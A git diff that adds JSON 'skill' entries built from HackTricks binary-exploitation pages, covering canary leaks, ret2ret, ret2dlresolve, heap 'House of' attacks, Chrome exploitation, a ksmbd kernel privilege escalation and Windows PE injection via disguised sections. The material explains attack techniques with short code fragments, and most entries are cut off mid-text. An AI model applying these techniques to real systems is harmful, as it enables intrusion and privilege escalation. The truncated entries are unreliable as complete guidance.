diff --git a/skills/binary_exploitation_77bddec8c9b0.json b/skills/binary_exploitation_77bddec8c9b0.json
new file mode 100644
index 0000000..04b8ef3
--- /dev/null
+++ b/skills/binary_exploitation_77bddec8c9b0.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_77bddec8c9b0",
+ "category": "binary-exploitation",
+ "title": "print stack canary",
+ "description": "# Print Stack Canary\n\n{{#include ../../../banners/hacktricks-training.md}}\n\n## Enlarge printed stack\n\nImagine a situation where a **program vulnerable** to stack overflow can execute a **puts** function **pointing** to **part** of the **stack overflow**. The attacker knows that the **first byte of the canary is a null byte** (`\\x00`) and the rest of the canary are **random** bytes. Then, the attacker may create an overflow that **overwrites the stack until just the first byte of the canary**.\n\nT",
+ "payloads": [
+ "# Print Stack Canary",
+ "{{#include ../../../banners/hacktricks-training.md}}",
+ "## Enlarge printed stack",
+ "Imagine a situation where a **program vulnerable** to stack overflow can execute a **puts** function **pointing** to **part** of the **stack overflow**. The attacker knows that the **first byte of the canary is a null byte** (`\\x00`) and the rest of the canary are **random** bytes. Then, the attacker may create an overflow that **overwrites the stack until just the first byte of the canary**.",
+ "Then, the attacker **calls the puts functionalit**y on the middle of the payload which will **print all the canary** (except from the first null byte).",
+ "With this info the attacker can **craft and send a new attack** knowing the canary (in the same program session).",
+ "Obviously, this tactic is very **restricted** as the attacker needs to be able to **print** the **content** of his **payload** to **exfiltrate** the **canary** and then be able to create a new payload (in the **same program session**) and **send** the **real buffer overflow**.",
+ "**CTF examples:**",
+ "- [**https://guyinatuxedo.github.io/08-bof_dynamic/csawquals17_svc/index.html**](https://guyinatuxedo.github.io/08-bof_dynamic/csawquals17_svc/index.html)",
+ "- 64 bit, ASLR enabled but no PIE, the first step is to fill an overflow until the byte 0x00 of the canary to then call puts and leak it. With the canary a ROP gadget is created to call puts to leak the address of puts from the GOT and the a ROP gadget to call `system('/bin/sh')`",
+ "- [**https://guyinatuxedo.github.io/14-ret_2_system/hxp18_poorCanary/index.html**](https://guyinatuxedo.github.io/14-ret_2_system/hxp18_poorCanary/index.html)",
+ "- 32 bit, ARM, no relro, canary, nx, no pie. Overflow with a call to puts on it to leak the canary + ret2lib calling `system` with a ROP chain to pop r0 (arg `/bin/sh`) and pc (address of system)",
+ "## Arbitrary Read",
+ "With an **arbitrary read** like the one provided by format **strings** it might be possible to leak the canary. Check this example: [**https://ir0nstone.gitbook.io/notes/types/stack/canaries**](https://ir0nstone.gitbook.io/notes/types/stack/canaries) and you can read about abusing format strings to read arbitrary memory addresses in:",
+ "{{#ref}}"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_77d6cb2d2285.json b/skills/binary_exploitation_77d6cb2d2285.json
new file mode 100644
index 0000000..3a75a85
--- /dev/null
+++ b/skills/binary_exploitation_77d6cb2d2285.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_77d6cb2d2285",
+ "category": "binary-exploitation",
+ "title": "ret2ret",
+ "description": "# Ret2ret & Reo2pop\n\n{{#include ../../../banners/hacktricks-training.md}}\n\n## Ret2ret\n\nThe main **goal** of this technique is to try to **bypass ASLR by abusing an existing pointer in the stack**.\n\nBasically, stack overflows are usually caused by strings, and **strings end with a null byte at the end** in memory. This allows to try to reduce the place pointed by na existing pointer already existing n the stack. So if the stack contained `0xbfffffdd`, this overflow could transform it into `0xbfff",
+ "payloads": [
+ "# Ret2ret & Reo2pop",
+ "{{#include ../../../banners/hacktricks-training.md}}",
+ "## Ret2ret",
+ "The main **goal** of this technique is to try to **bypass ASLR by abusing an existing pointer in the stack**.",
+ "Basically, stack overflows are usually caused by strings, and **strings end with a null byte at the end** in memory. This allows to try to reduce the place pointed by na existing pointer already existing n the stack. So if the stack contained `0xbfffffdd`, this overflow could transform it into `0xbfffff00` (note the last zeroed byte).",
+ "If that address points to our shellcode in the stack, it's possible to make the flow reach that address by **adding addresses to the `ret` instruction** util this one is reached.",
+ "Therefore the attack would be like this:",
+ "- NOP sled",
+ "- Shellcode",
+ "- Overwrite the stack from the EIP with **addresses to `ret`** (RET sled)",
+ "- 0x00 added by the string modifying an address from the stack making it point to the NOP sled",
+ "Following [**this link**](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2ret.c) you can see an example of a vulnerable binary and [**in this one**](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2retexploit.c) the exploit.",
+ "## Ret2pop",
+ "In case you can find a **perfect pointer in the stack that you don't want to modify** (in `ret2ret` we changes the final lowest byte to `0x00`), you can perform the same `ret2ret` attack, but the **length of the RET sled must be shorted by 1** (so the final `0x00` overwrites the data just before the perfect pointer), and the **last** address of the RET sled must point to **`pop ; ret`**.\\",
+ "This way, the **data before the perfect pointer will be removed** from the stack (this is the data affected by the `0x00`) and the **final `ret` will point to the perfect address** in the stack without any change."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2ret.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_78afeebd3eec.json b/skills/binary_exploitation_78afeebd3eec.json
new file mode 100644
index 0000000..5010ce2
--- /dev/null
+++ b/skills/binary_exploitation_78afeebd3eec.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_78afeebd3eec",
+ "category": "binary-exploitation",
+ "title": "ret2vdso",
+ "description": "# Ret2vDSO\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Basic Information\n\nThere might be **gadgets in the vDSO region**, which is used to change from user mode to kernel mode. In these type of challenges, usually a kernel image is provided to dump the vDSO region.\n\nFollowing the example from [https://7rocky.github.io/en/ctf/other/htb-cyber-apocalypse/maze-of-mist/](https://7rocky.github.io/en/ctf/other/htb-cyber-apocalypse/maze-of-mist/) it's possible to see how it was possible to dum",
+ "payloads": [
+ "# Ret2vDSO",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "There might be **gadgets in the vDSO region**, which is used to change from user mode to kernel mode. In these type of challenges, usually a kernel image is provided to dump the vDSO region.",
+ "Following the example from [https://7rocky.github.io/en/ctf/other/htb-cyber-apocalypse/maze-of-mist/](https://7rocky.github.io/en/ctf/other/htb-cyber-apocalypse/maze-of-mist/) it's possible to see how it was possible to dump the vdso section and move it to the host with:",
+ "```bash",
+ "# Find addresses",
+ "cat /proc/76/maps",
+ "08048000-08049000 r--p 00000000 00:02 317 /target",
+ "08049000-0804a000 r-xp 00001000 00:02 317 /target",
+ "0804a000-0804b000 rw-p 00002000 00:02 317 /target",
+ "f7ff8000-f7ffc000 r--p 00000000 00:00 0 [vvar]",
+ "f7ffc000-f7ffe000 r-xp 00000000 00:00 0 [vdso]",
+ "fffdd000-ffffe000 rw-p 00000000 00:00 0 [stack]",
+ "# Dump it"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/rop-return-oriented-programing/ret2vdso.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_7c9b5bcc58fa.json b/skills/binary_exploitation_7c9b5bcc58fa.json
new file mode 100644
index 0000000..7f673d8
--- /dev/null
+++ b/skills/binary_exploitation_7c9b5bcc58fa.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_7c9b5bcc58fa",
+ "category": "binary-exploitation",
+ "title": "ios corellium",
+ "description": "# iOS How to Connect to Corellium\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## **Prereqs**\n- A Corellium iOS VM (jailbroken or not). In this guide we assume you have access to Corellium.\n- Local tools: **ssh/scp**.\n- (Optional) **SSH keys** added to your Corellium project for passwordless logins.\n\n\n## **Connect to the iPhone VM from localhost**\n\n### A) **Quick Connect (no VPN)**\n0) Add you ssh key in **`/admin/projects`** (recommended).\n1) Open the device page \u2192 **Connect**\n2) **Copy t",
+ "payloads": [
+ "# iOS How to Connect to Corellium",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## **Prereqs**",
+ "- A Corellium iOS VM (jailbroken or not). In this guide we assume you have access to Corellium.",
+ "- Local tools: **ssh/scp**.",
+ "- (Optional) **SSH keys** added to your Corellium project for passwordless logins.",
+ "## **Connect to the iPhone VM from localhost**",
+ "### A) **Quick Connect (no VPN)**",
+ "0) Add you ssh key in **`/admin/projects`** (recommended).",
+ "1) Open the device page \u2192 **Connect**",
+ "2) **Copy the Quick Connect SSH command** shown by Corellium and paste it in your terminal.",
+ "3) Enter the password or use your key (recommended).",
+ "### B) **VPN \u2192 direct SSH**",
+ "0) Add you ssh key in **`/admin/projects`** (recommended).",
+ "1) Device page \u2192 **CONNECT** \u2192 **VPN** \u2192 download `.ovpn` and connect with any VPN client that supports TAP mode. (Check [https://support.corellium.com/features/connect/vpn](https://support.corellium.com/features/connect/vpn) if you have issues.)"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/ios-exploiting/ios-corellium.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_804b81419b09.json b/skills/binary_exploitation_804b81419b09.json
new file mode 100644
index 0000000..72ecdcb
--- /dev/null
+++ b/skills/binary_exploitation_804b81419b09.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_804b81419b09",
+ "category": "binary-exploitation",
+ "title": "ret2dlresolve",
+ "description": "# Ret2dlresolve\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Basic Information\n\nAs explained in the page about [**GOT/PLT**](../arbitrary-write-2-exec/aw2exec-got-plt.md) and [**Relro**](../common-binary-protections-and-bypasses/relro.md), binaries without Full Relro will resolve symbols (like addresses to external libraries) the first time they are used. This resolution occurs calling the function **`_dl_runtime_resolve`**.\n\nThe **`_dl_runtime_resolve`** function takes from the stack ",
+ "payloads": [
+ "# Ret2dlresolve",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "As explained in the page about [**GOT/PLT**](../arbitrary-write-2-exec/aw2exec-got-plt.md) and [**Relro**](../common-binary-protections-and-bypasses/relro.md), binaries without Full Relro will resolve symbols (like addresses to external libraries) the first time they are used. This resolution occurs calling the function **`_dl_runtime_resolve`**.",
+ "The **`_dl_runtime_resolve`** function takes from the stack references to some structures it needs in order to **resolve** the specified symbol.",
+ "Therefore, it's possible to **fake all these structures** to make the dynamic linked resolving the requested symbol (like **`system`** function) and call it with a configured parameter (e.g. **`system('/bin/sh')`**).",
+ "Usually, all these structures are faked by making an **initial ROP chain that calls `read`** over a writable memory, then the **structures** and the string **`'/bin/sh'`** are passed so they are stored by read in a known location, and then the ROP chain continues by calling **`_dl_runtime_resolve`** , having it **resolve the address of `system`** in the fake structures and **calling this address** with the address to `$'/bin/sh'`.",
+ "> [!TIP]",
+ "> This technique is useful specially if there aren't syscall gadgets (to use techniques such as [**ret2syscall**](rop-syscall-execv/index.html) or [SROP](srop-sigreturn-oriented-programming/index.html)) and there are't ways to leak libc addresses.",
+ "Chek this video for a nice explanation about this technique in the second half of the video:",
+ "{{#ref}}",
+ "https://youtu.be/ADULSwnQs-s?feature=shared",
+ "{{#endref}}",
+ "Or check these pages for a step-by-step explanation:",
+ "- [https://www.ctfrecipes.com/pwn/stack-exploitation/arbitrary-code-execution/code-reuse-attack/ret2dlresolve#how-it-works](https://www.ctfrecipes.com/pwn/stack-exploitation/arbitrary-code-execution/code-reuse-attack/ret2dlresolve#how-it-works)"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_92da961b9a20.json b/skills/binary_exploitation_92da961b9a20.json
new file mode 100644
index 0000000..b119e32
--- /dev/null
+++ b/skills/binary_exploitation_92da961b9a20.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_92da961b9a20",
+ "category": "binary-exploitation",
+ "title": "house of einherjar",
+ "description": "# House of Einherjar\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Basic Information\n\n### Code\n\n- Check the example from [https://github.com/shellphish/how2heap/blob/master/glibc_2.35/house_of_einherjar.c](https://github.com/shellphish/how2heap/blob/master/glibc_2.35/house_of_einherjar.c)\n- Or the one from [https://guyinatuxedo.github.io/42-house_of_einherjar/house_einherjar_exp/index.html#house-of-einherjar-explanation](https://guyinatuxedo.github.io/42-house_of_einherjar/house_einherj",
+ "payloads": [
+ "# House of Einherjar",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "### Code",
+ "- Check the example from [https://github.com/shellphish/how2heap/blob/master/glibc_2.35/house_of_einherjar.c](https://github.com/shellphish/how2heap/blob/master/glibc_2.35/house_of_einherjar.c)",
+ "- Or the one from [https://guyinatuxedo.github.io/42-house_of_einherjar/house_einherjar_exp/index.html#house-of-einherjar-explanation](https://guyinatuxedo.github.io/42-house_of_einherjar/house_einherjar_exp/index.html#house-of-einherjar-explanation) (you might need to fill the tcache)",
+ "### Goal",
+ "- The goal is to allocate memory in almost any specific address.",
+ "### Requirements",
+ "- Create a fake chunk when we want to allocate a chunk:",
+ "- Set pointers to point to itself to bypass sanity checks",
+ "- One-byte overflow with a null byte from one chunk to the next one to modify the `PREV_INUSE` flag.",
+ "- Indicate in the `prev_size` of the off-by-null abused chunk the difference between itself and the fake chunk",
+ "- The fake chunk size must also have been set the same size to bypass sanity checks",
+ "- For constructing these chunks, you will need a heap leak."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/libc-heap/house-of-einherjar.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_94ca236e77de.json b/skills/binary_exploitation_94ca236e77de.json
new file mode 100644
index 0000000..61e2717
--- /dev/null
+++ b/skills/binary_exploitation_94ca236e77de.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_94ca236e77de",
+ "category": "binary-exploitation",
+ "title": "chrome exploiting",
+ "description": "# Chrome Exploiting\n\n{{#include ../banners/hacktricks-training.md}}\n\n> This page provides a high-level yet **practical** overview of a modern \"full-chain\" exploitation workflow against Google Chrome 130 based on the research series **\u201c101 Chrome Exploitation\u201d** (Part-0 \u2014 Preface). \n> The goal is to give pentesters and exploit-developers the minimum background necessary to reproduce or adapt the techniques for their own research.\n\n## 1. Chrome Architecture Recap \nUnderstanding the attack surfac",
+ "payloads": [
+ "# Chrome Exploiting",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "> This page provides a high-level yet **practical** overview of a modern \"full-chain\" exploitation workflow against Google Chrome 130 based on the research series **\u201c101 Chrome Exploitation\u201d** (Part-0 \u2014 Preface).",
+ "> The goal is to give pentesters and exploit-developers the minimum background necessary to reproduce or adapt the techniques for their own research.",
+ "## 1. Chrome Architecture Recap",
+ "Understanding the attack surface requires knowing where code is executed and which sandboxes apply.",
+ "",
+ "Chrome process & sandbox layout",
+ "```text",
+ "+-------------------------------------------------------------------------+",
+ "| Chrome Browser |",
+ "| |",
+ "| +----------------------------+ +-----------------------------+ |",
+ "| | Renderer Process | | Browser/main Process | |",
+ "| | [No direct OS access] | | [OS access] | |"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/chrome-exploiting.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_a2c29928df09.json b/skills/binary_exploitation_a2c29928df09.json
new file mode 100644
index 0000000..6fd9b4d
--- /dev/null
+++ b/skills/binary_exploitation_a2c29928df09.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_a2c29928df09",
+ "category": "binary-exploitation",
+ "title": "uninitialized variables",
+ "description": "# Uninitialized Variables\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Basic Information\n\nThe core idea here is to understand what happens with **uninitialized variables as they will have the value that was already in the assigned memory to them.** Example:\n\n- **Function 1: `initializeVariable`**: We declare a variable `x` and assign it a value, let's say `0x1234`. This action is akin to reserving a spot in memory and putting a specific value in it.\n- **Function 2: `useUninitializedVar",
+ "payloads": [
+ "# Uninitialized Variables",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "The core idea here is to understand what happens with **uninitialized variables as they will have the value that was already in the assigned memory to them.** Example:",
+ "- **Function 1: `initializeVariable`**: We declare a variable `x` and assign it a value, let's say `0x1234`. This action is akin to reserving a spot in memory and putting a specific value in it.",
+ "- **Function 2: `useUninitializedVariable`**: Here, we declare another variable `y` but do not assign any value to it. In C, uninitialized variables don't automatically get set to zero. Instead, they retain whatever value was last stored at their memory location.",
+ "When we run these two functions **sequentially**:",
+ "1. In `initializeVariable`, `x` is assigned a value (`0x1234`), which occupies a specific memory address.",
+ "2. In `useUninitializedVariable`, `y` is declared but not assigned a value, so it takes the memory spot right after `x`. Due to not initializing `y`, it ends up \"inheriting\" the value from the same memory location used by `x`, because that's the last value that was there.",
+ "This behavior illustrates a key concept in low-level programming: **Memory management is crucial**, and uninitialized variables can lead to unpredictable behavior or security vulnerabilities, as they may unintentionally hold sensitive data left in memory.",
+ "Uninitialized stack variables could pose several security risks like:",
+ "- **Data Leakage**: Sensitive information such as passwords, encryption keys, or personal details can be exposed if stored in uninitialized variables, allowing attackers to potentially read this data.",
+ "- **Information Disclosure**: The contents of uninitialized variables might reveal details about the program's memory layout or internal operations, aiding attackers in developing targeted exploits.",
+ "- **Crashes and Instability**: Operations involving uninitialized variables can result in undefined behavior, leading to program crashes or unpredictable outcomes.",
+ "- **Arbitrary Code Execution**: In certain scenarios, attackers could exploit these vulnerabilities to alter the program's execution flow, enabling them to execute arbitrary code, which might include remote code execution threats."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/stack-overflow/uninitialized-variables.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_a4699b59b411.json b/skills/binary_exploitation_a4699b59b411.json
new file mode 100644
index 0000000..14ab185
--- /dev/null
+++ b/skills/binary_exploitation_a4699b59b411.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_a4699b59b411",
+ "category": "binary-exploitation",
+ "title": "pointer redirecting",
+ "description": "# Pointer Redirecting\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## String pointers\n\nIf a function call is going to use an address of a string that is located in the stack, it's possible to abuse the buffer overflow to **overwrite this address** and put an **address to a different string** inside the binary.\n\nIf for example a **`system`** function call is going to **use the address of a string to execute a command**, an attacker could place the **address of a different string in the sta",
+ "payloads": [
+ "# Pointer Redirecting",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## String pointers",
+ "If a function call is going to use an address of a string that is located in the stack, it's possible to abuse the buffer overflow to **overwrite this address** and put an **address to a different string** inside the binary.",
+ "If for example a **`system`** function call is going to **use the address of a string to execute a command**, an attacker could place the **address of a different string in the stack**, **`export PATH=.:$PATH`** and create in the current directory an **script with the name of the first letter of the new string** as this will be executed by the binary.",
+ "You can find an **example** of this in:",
+ "- [https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/strptr.c](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/strptr.c)",
+ "- [https://guyinatuxedo.github.io/04-bof_variable/tw17_justdoit/index.html](https://guyinatuxedo.github.io/04-bof_variable/tw17_justdoit/index.html)",
+ "- 32bit, change address to flags string in the stack so it's printed by `puts`",
+ "## Function pointers",
+ "Same as string pointer but applying to functions, if the **stack contains the address of a function** that will be called, it's possible to **change it** (e.g. to call **`system`**).",
+ "You can find an example in:",
+ "- [https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/funcptr.c](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/funcptr.c)",
+ "## References",
+ "- [https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/NOTES.md#pointer-redirecting](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/NOTES.md#pointer-redirecting)"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/stack-overflow/pointer-redirecting.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_a65b2c923079.json b/skills/binary_exploitation_a65b2c923079.json
new file mode 100644
index 0000000..664b4c7
--- /dev/null
+++ b/skills/binary_exploitation_a65b2c923079.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_a65b2c923079",
+ "category": "binary-exploitation",
+ "title": "house of rabbit",
+ "description": "# House of Rabbit\n\n{{#include ../../banners/hacktricks-training.md}}\n\n### Requirements\n\n1. **Ability to modify fast bin fd pointer or size**: This means you can change the forward pointer of a chunk in the fastbin or its size.\n2. **Ability to trigger `malloc_consolidate`**: This can be done by either allocating a large chunk or merging the top chunk, which forces the heap to consolidate chunks.\n\n### Goals\n\n1. **Create overlapping chunks**: To have one chunk overlap with another, allowing for fur",
+ "payloads": [
+ "# House of Rabbit",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "### Requirements",
+ "1. **Ability to modify fast bin fd pointer or size**: This means you can change the forward pointer of a chunk in the fastbin or its size.",
+ "2. **Ability to trigger `malloc_consolidate`**: This can be done by either allocating a large chunk or merging the top chunk, which forces the heap to consolidate chunks.",
+ "### Goals",
+ "1. **Create overlapping chunks**: To have one chunk overlap with another, allowing for further heap manipulations.",
+ "2. **Forge fake chunks**: To trick the allocator into treating a fake chunk as a legitimate chunk during heap operations.",
+ "## Steps of the attack",
+ "### POC 1: Modify the size of a fast bin chunk",
+ "**Objective**: Create an overlapping chunk by manipulating the size of a fastbin chunk.",
+ "- **Step 1: Allocate Chunks**",
+ "```cpp",
+ "unsigned long* chunk1 = malloc(0x40); // Allocates a chunk of 0x40 bytes at 0x602000",
+ "unsigned long* chunk2 = malloc(0x40); // Allocates another chunk of 0x40 bytes at 0x602050"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/libc-heap/house-of-rabbit.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_a71d56772590.json b/skills/binary_exploitation_a71d56772590.json
new file mode 100644
index 0000000..9b6a484
--- /dev/null
+++ b/skills/binary_exploitation_a71d56772590.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_a71d56772590",
+ "category": "binary-exploitation",
+ "title": "house of roman",
+ "description": "# House of Roman\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Basic Information\n\nThis was a very interesting technique that allowed for RCE without leaks via fake fastbins, the unsorted_bin attack and relative overwrites. However it has ben [**patched**](https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=b90ddd08f6dd688e651df9ee89ca3a69ff88cd0c).\n\n### Code\n\n- You can find an example in [https://github.com/shellphish/how2heap/blob/master/glibc_2.23/house_of_roman.c](https://github.c",
+ "payloads": [
+ "# House of Roman",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "This was a very interesting technique that allowed for RCE without leaks via fake fastbins, the unsorted_bin attack and relative overwrites. However it has ben [**patched**](https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=b90ddd08f6dd688e651df9ee89ca3a69ff88cd0c).",
+ "### Code",
+ "- You can find an example in [https://github.com/shellphish/how2heap/blob/master/glibc_2.23/house_of_roman.c](https://github.com/shellphish/how2heap/blob/master/glibc_2.23/house_of_roman.c)",
+ "### Goal",
+ "- RCE by abusing relative pointers",
+ "### Requirements",
+ "- Edit fastbin and unsorted bin pointers",
+ "- 12 bits of randomness must be brute forced (0.02% chance) of working",
+ "## Attack Steps",
+ "### Part 1: Fastbin Chunk points to \\_\\_malloc_hook",
+ "Create several chunks:",
+ "- `fastbin_victim` (0x60, offset 0): UAF chunk later to edit the heap pointer later to point to the LibC value."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/libc-heap/house-of-roman.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_a781a2be60f7.json b/skills/binary_exploitation_a781a2be60f7.json
new file mode 100644
index 0000000..d400bd0
--- /dev/null
+++ b/skills/binary_exploitation_a781a2be60f7.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_a781a2be60f7",
+ "category": "binary-exploitation",
+ "title": "ksmbd streams xattr oob write cve 2025 37947",
+ "description": "# ksmbd streams_xattr OOB write \u2192 local LPE (CVE-2025-37947)\n\n{{#include ../../banners/hacktricks-training.md}}\n\nThis page documents a deterministic out-of-bounds write in ksmbd streams handling that enables a reliable Linux kernel privilege escalation on Ubuntu 22.04 LTS (5.15.0-153-generic), bypassing KASLR, SMEP, and SMAP using standard kernel heap primitives (msg_msg + pipe_buffer).\n\n- Affected component: fs/ksmbd/vfs.c \u2014 ksmbd_vfs_stream_write()\n- Primitive: page-overflow OOB write past a 0",
+ "payloads": [
+ "# ksmbd streams_xattr OOB write \u2192 local LPE (CVE-2025-37947)",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "This page documents a deterministic out-of-bounds write in ksmbd streams handling that enables a reliable Linux kernel privilege escalation on Ubuntu 22.04 LTS (5.15.0-153-generic), bypassing KASLR, SMEP, and SMAP using standard kernel heap primitives (msg_msg + pipe_buffer).",
+ "- Affected component: fs/ksmbd/vfs.c \u2014 ksmbd_vfs_stream_write()",
+ "- Primitive: page-overflow OOB write past a 0x10000-byte kvmalloc() buffer",
+ "- Preconditions: ksmbd running with an authenticated, writable share using vfs streams_xattr",
+ "Example smb.conf",
+ "```ini",
+ "[share]",
+ "path = /share",
+ "vfs objects = streams_xattr",
+ "writeable = yes",
+ "Root cause (allocation clamped, memcpy at unclamped offset)",
+ "- The function computes size = *pos + count, clamps size to XATTR_SIZE_MAX (0x10000) when exceeded, and recomputes count = (*pos + count) - 0x10000, but still performs memcpy(&stream_buf[*pos], buf, count) into a 0x10000-byte buffer. If *pos \u2265 0x10000 the destination pointer is already outside the allocation, producing an OOB write of count bytes.",
+ ""
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/linux-kernel-exploitation/ksmbd-streams_xattr-oob-write-cve-2025-37947.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_a7e4b6416b95.json b/skills/binary_exploitation_a7e4b6416b95.json
new file mode 100644
index 0000000..e7a11f0
--- /dev/null
+++ b/skills/binary_exploitation_a7e4b6416b95.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_a7e4b6416b95",
+ "category": "binary-exploitation",
+ "title": "windows vectored overloading",
+ "description": "# Vectored Overloading PE Injection\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Technique overview\n\nVectored Overloading is a **Windows PE injection primitive** that fuses classic [Module Overloading](https://github.com/hasherezade/module_overloading) with **Vectored Exception Handlers (VEHs)** and **hardware breakpoints**. Instead of patching `LoadLibrary` or writing its own loader, the adversary:\n\n1. Creates a `SEC_IMAGE` section backed by a legitimate DLL (e.g., `wmp.dll`).\n2. Overwri",
+ "payloads": [
+ "# Vectored Overloading PE Injection",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Technique overview",
+ "Vectored Overloading is a **Windows PE injection primitive** that fuses classic [Module Overloading](https://github.com/hasherezade/module_overloading) with **Vectored Exception Handlers (VEHs)** and **hardware breakpoints**. Instead of patching `LoadLibrary` or writing its own loader, the adversary:",
+ "1. Creates a `SEC_IMAGE` section backed by a legitimate DLL (e.g., `wmp.dll`).",
+ "2. Overwrites the mapped view with a fully relocated malicious PE but keeps the section object pointing to the benign image on disk.",
+ "3. Registers a VEH and programs debug registers so every call to `NtOpenSection`, `NtMapViewOfSection`, and optionally `NtClose` raises a user-mode breakpoint.",
+ "4. Calls `LoadLibrary(\"amsi.dll\")` (or any other benign target). When the Windows loader invokes those syscalls, the VEH **skips the kernel transition** and returns the handles and base addresses of the prepared malicious image.",
+ "Because the loader still believes it mapped the requested DLL, tooling that only looks at section backing files sees `wmp.dll` even though memory now contains the attacker\u2019s payload. Meanwhile, imports/TLS callbacks are still resolved by the genuine loader, significantly reducing the amount of custom PE-parsing logic the adversary must maintain.",
+ "## Stage 1 \u2013 Build the disguised section",
+ "1. **Create and map a section for the decoy DLL**",
+ "NtCreateSection(&DecoySection, SECTION_ALL_ACCESS, NULL,",
+ "0, PAGE_READWRITE, SEC_IMAGE, L\"\\??\\C:\\\\Windows\\\\System32\\\\wmp.dll\");",
+ "NtMapViewOfSection(DecoySection, GetCurrentProcess(), &DecoyView, 0, 0,",
+ "NULL, &DecoySize, ViewShare, 0, PAGE_READWRITE);"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/windows-vectored-overloading.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_ae34cc6a646c.json b/skills/binary_exploitation_ae34cc6a646c.json
new file mode 100644
index 0000000..63b0b28
--- /dev/null
+++ b/skills/binary_exploitation_ae34cc6a646c.json
@@ -0,0 +1,27 @@
+{
